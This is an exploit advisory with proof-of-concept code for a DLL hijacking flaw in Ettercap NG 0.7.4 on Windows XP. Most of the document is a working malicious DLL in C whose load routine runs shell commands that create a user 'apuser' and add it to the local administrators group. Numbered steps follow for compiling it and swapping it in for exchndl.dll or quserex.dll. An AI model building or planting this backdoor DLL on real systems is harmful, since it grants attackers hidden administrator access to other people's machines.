Ettercap NG version 0.7.4 suffers from a DLL hijacking vulnerability.
d04c00509e1d3444d662e6b7f22e92825bfd705db741648e0c2385bed9551510
Exploit Title: ettercap NG-0.7.4 Dll hijacking vulnerability (quserex.dll - exchndl.dll)
Date: Tuesday April 24
Author: nimaarek
Software Link: http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/
Version: NG-0.7.4
Tested on: Windows XP SP3
.__ __
____ |__| _____ _____ _____ _______ ____ | | __
/ \| |/ \\__ \ \__ \\_ __ \_/ __ \| |/ /
| | \ | Y Y \/ __ \_/ __ \| | \/\ ___/| <
|___| /__|__|_| (____ (____ /__| \___ >__|_ \
\/ \/ \/ \/ \/ \/
/*
Application Information:
Application: Ettercap.exe
Version: NG-0.7.4
Company Name: The EtterCap community, http://ettercap.sourceforge.net/
File Date: Tuesday April 24
Description: EtterCap sniffer
Operating System: Windows XP SP3
Total Extensions Verified: 2
Verified Extensions: htm;html;
=============================================================
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>
int main()
{
system("net user apuser appass /add");
system("net localgroup administrators apuser /add");
exit(0);
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
main();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=============================================================
Instructions:
1. Compile dll
2. Replace exchndl.dll Or quserex.dll in Ettercap directory with your newly compiled dll
3. Launch Ettercap
4. Bo0o0o0o0o0o0o0m !
Greet to my Lovely friends :
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+
|M|O|H|3|N|C|O|D|E|r| |a|n|d| |A|m|i|r| |N|e|m|a|t|i|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+